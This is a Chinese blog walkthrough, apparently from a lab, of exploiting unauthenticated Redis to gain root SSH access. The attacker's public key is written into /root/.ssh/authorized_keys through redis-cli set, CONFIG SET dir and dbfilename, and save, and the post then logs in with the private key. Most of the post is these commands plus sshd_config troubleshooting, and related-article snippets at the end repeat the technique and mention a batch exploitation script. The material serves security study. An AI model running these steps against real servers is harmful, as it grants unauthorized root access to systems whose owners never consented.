Redis未授权访问之ssh免密登录(踩坑)

最新推荐文章于 2023-12-11 16:35:09 发布
最新推荐文章于 2023-12-11 16:35:09 发布
阅读量3.9k 收藏 11
点赞数 5
分类专栏: Web安全攻防 渗透测试 文章标签: redis 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zlirving_/article/details/107021811
版权

关于Redis漏洞的详解及写shell、getshell的利用请出示门票:传送门

利用原理

利用 Redis 自身的提供的 config 命令,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接使用对应的私钥登录目标服务器。

利用
实验场景

Redis服务器(靶机):Ubuntu 16.4 ----- 192.168.101.46
Redis客户机(攻击机):Ubuntu 16.4 ----- 192.168.101.47

一、在攻击机(redis客户端)中生成ssh公钥和私钥,密码设置为空

ssh-keygen –t rsa
在这里插入图片描述

二、进入/root/.ssh目录: cd /root/.ssh , 讲生成的公钥保存到1.txt(名字随意)

$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
在这里插入图片描述

三、链接目标服务器上的Redis服务,将保存的公钥1.txt写入Redis(使用redis-cli -h ip命令连接靶机,将文件写入)

$ cat 1.txt | redis-cli -h 10.10.10.135 -x set crack
在这里插入图片描述

四、通过客户端远程登陆目标靶机的Redis服务

使用 CONFIG GET dir 命令得到Redis备份的路径
redis-cli -h 10.10.10.135
CONFIG GET dir
更改Redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh)
config set dir /root/.ssh
设置上传公钥的备份文件名字为authorized_keys
CONFIG SET dbfilename authorized_keys
检查是否更改成功(查看有没有authorized_keys文件),没有问题就保存然后退出
CONFIG GET dbfilename
save
exit
在这里插入图片描述
靶机服务器上可以看到文件已被写入
在这里插入图片描述

五、在攻击机上使用SSH免密登录靶机

ssh -i id_rsa [ip]
在这里插入图片描述

踩坑记录
  1. 靶机服务端关于ssh的配置
    vim /etc/ssh/sshd_config
PermitRootLogin yes  #允许root登录
PermitEmptyPasswords yes  #允许空密码登录
PasswordAuthentication yes  #设置是否使用口令验证。
PasswordAuthentication no   //yes改为no
RSAAuthentication yes   #去掉前面的注释
PubkeyAuthentication yes  #去掉前面的注释
AuthorizedKeysFile .ssh/authorized_keys  #去掉前面的注释

  1. cd /root/.ssh/
    bash: cd: /root/.ssh/: No such file or directory
    由于本机没有用root登陆过
    解决办法:
    用root用户登录,执行下ssh操作,就能自动生成
    ssh localhost ----> yes ----> 输入password

  2. authorized_keys 该文件名不要打错

  3. redis服务端要以root权限运行

 
GOT IT!

 
******************************************************
小实验小结,具体测试利用方式需根据具体实践场景~

想冲大厂的癞蛤蟆
关注
  • 5
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis-desktop redis管理工具 支持SSH 无bug版
12-12
Redis-desktop redis管理工具 支持SSH,SSL,Advanced sessting 无bug版
Redis授权访问配合SSH key文件利用详解
01-19
前言 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis 授权访问的问题是一直存在的问题,知道创宇安全研究团队历史上也做过相关的应急,今日,又出现 Redis 授权访问配合 SSH key 文件被利用的情况,导致一大批 Redis 服务器被黑,今天我们来简要的分析下。 一、漏洞概述 Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 R
python脚本实现Redis授权批量提权
12-16
前言 本文主要给大家介绍了关于redis授权批量提权的相关内容,分享出来供大家参考学习,下面话不多说了,来一起看看详细的介绍吧。 安装依赖 sudo easy_install redis 使用 redis python hackredis.py usage: hackredis.py [-h] [-l IPLIST] [-p PORT] [-r ID_RSAFILE] [-sp SSH_PORT] For Example: ----------------------------------------------------------------------------- pyt
maven 搭建 ssh整合redis2.9缓存(spring-data-redis及jedis 原生操作 两种)
01-26
maven 搭建 ssh整合redis2.9缓存,使用spring的cacheable进行注解使
SSH2中配置Redis缓存
11-06
Redis是基于内存,也可以基于磁盘持久化nosql数据库。Redis 官网推荐给java 使用的客户端很多:Jedis、Redisson、JRedis、JDBC-Redis 等,当然首推是jedis。
Redis-密钥登录ssh,免密码
weixin_54227009的博客
06-06 1759
1、在kali上生成密钥命令:ssh-keygen -t rsa因为我这里有了,所以y选择了覆盖如果是想无密码登录的话,则直接enter跳过2、 因为我这里config set dir /root/.sshdir有问题,所以我直接就把生成的密钥放目标靶机的/root/.ssh/authorized_key文件下了原操作应该是:(echo -e "\n\n"; cat id_rsa.pub;echo -e "\n\n")>key.txt防止乱码,将公钥写入key.txt中将key.txt导入进目标机器cat
linux7安装redis7.2.3以及使用ssh方式远程连接redis教程
最新发布
12-11 536
9.使用redis desktop manager工具以ssh方式远程连接redis。4.复制redis.conf配置文件到安装目录并修改为以后端模式启动。2. 上传到linux服并解压。5.启动redis并查看进程。6.客户端访问redis。3.编译并设置安装目录。
redis授权访问--拿webshell以及实现ssh免密登录
Xiaolisec的博客
08-30 494
redis是一个非常快速的,开源的、支持网络、可基于内存亦可持久化的日志型、非关系类型的数据库;提供多种语言的 API,java/c/c++/c#/php/javascript/
利用redis漏洞实现ssh免密登陆
OfficerGoodbody的博客
09-01 786
环境 靶机:ip:172.16.7.111ssh:22,如果不是22需要用nmap扫一下redis使用root启动,yum安装的redis默认启动用户是redis,如果做实验的话需要修改/usr/lib/systemd/system/redis.service中的配置redis设置密码,如果有密码需要先进行暴破 攻击机:ip:172.16.6.110安装了red...
redis授权写入ssh公钥登录
m0_46576302的博客
09-09 3410
利用redis的备份功能,写入ssh公钥
Redis-desktop redis管理工具 支持SSH 各种系统
11-26
redis可视化工具,亲测可用,整理了一些各个系统的安装包,支持ssh远程连接
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
前言 本文主要给大家介绍了关于Redis授权...攻击者在授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。 漏洞描述 部分 Redis
排查解决腾讯云服务器存在对外攻击行为,已阻断该服务器对其他服务器端口(TCP:6379)的访问
热门推荐
xiaobozhang1993的博客
08-05 1万+
【腾讯云】服务违规封禁提醒 解决方法来自腾讯客服 https://cloud.tencent.com/document/product/296/9604,这是我们给您的建议,建议您排查下您的服务器情况 您现在登录上您的服务器了嘛 您执行下crontab -l 给我看下 在执行 netstat -ano|egrep "tcp|udp" redis端口这里有问题 您执行netstat -tupln 给我看下 您这个非常危险 您re...
redis可视化工具(支持ssh链接)
一起coding,一起嗨。
02-20 2653
redis可视化工具(支持ssh链接) 近期用redis中的ssh通道链接服务器,出现以下问题: RedisDesktopManager提示:Connection error: QRedisClient compiled without ssh support 原来是2019.0版本不支持ssh连接,去官网下载需要收费才能使用ssh 于是找到了免费的0.9.3.817版本,这个版本支持ssh链接。 以下为获取0.9.3.817版本的下载地址(windows版本) 链接:https://pan.baidu.
【网络安全】通过Redis2.x实现ssh授权访问
kinghzking的专栏
08-23 2354
下载redis-server(目标机器,kali):https://pan.baidu.com/s/1I9mByRQjFaNvt040xOm8_w?下载redis-cli(攻击机器,win11):https://pan.baidu.com/s/1qAkZMBUWVWJvU2bpBq_LNQ?redis刚好能满足我们的需求,2.x版本的redis,默认配置,能被外网访问,并完成上面的操作,我们正是利用这个特性,完成。攻击机(win11)上连接目标机(kali)目标机器的redis-server安装和配置。
redis 报错 Redis protected-mode 配置文件没有真正启动
Py.ziMing的博客
11-20 256
(error) DENIED Redis is running in protected mode because protected mode is enabled Redis protected-mode 是3.2 之后加入的新特性,在Redis.conf的注释中,我们可以了解到,他的具体作用和启用条件 链接redis 时只能通过本地localhost (127.0.0.1)这个来链接,而不...
windows系统上使用openssh client连接远程Linux服务器的日志分析
SAP 资深技术专家 Jerry Wang 的技术分享
04-12 3674
在windows系统上使用ssh进行远程连接到一台Linux服务器: ssh -i C:\Users\i042416.ssh\KOI.pem -L 9221:localhost:9229 [email protected] 日志如下,逐行分析。 //这是我windows系统上openSSH的版本号。 OpenSSH_f...
redis 密钥登陆ssh
干铮的博客
01-31 1685
redis密钥登陆ssh 1.生成密钥 ssh-keygen -t rsa 2.防止乱码导入到key文件中 (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt cat key.txt | redis-cli -h 192.168.3.26 --pass 123456 -x set xxx --pass是登录密码 无密码可不填 redis-cli -h 192.168.3.26 config set dir /ro
ssh怎么免密登录公钥redis
07-27
要实现SSH免密登录,你需要遵循以下步骤: 1. 生成SSH密钥对:使用SSH密钥对可以实现安全的身份验证。打开终端并输入以下命令生成密钥对: ``` ssh-keygen -t rsa ``` 2. 按需求选择密钥保存位置和设置密码。 3. 将公钥添加到目标服务器:使用以下命令将公钥添加到目标服务器的`authorized_keys`文件中。 ``` ssh-copy-id -i ~/.ssh/id_rsa.pub user@server_ip ``` 其中,`user`是你登录目标服务器的用户名,`server_ip`是目标服务器的IP地址。 4. 验证免密登录:使用以下命令验证是否成功实现SSH免密登录。 ``` ssh user@server_ip ``` 如果你成功登录到服务器而无需输入密码,则说明免密登录已配置成功。 关于Redis,它本身不支持SSH免密登录,因为Redis是一个内存数据库,而SSH是用于远程服务器的安全登录协议。如果你想通过SSH连接到Redis服务器,并执行一些操作,你可以在连接到服务器后,在终端中运行Redis命令行客户端。例如: ``` redis-cli ``` 然后,你可以在Redis命令行客户端中执行所需的操作。 希望这些信息对你有所帮助!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值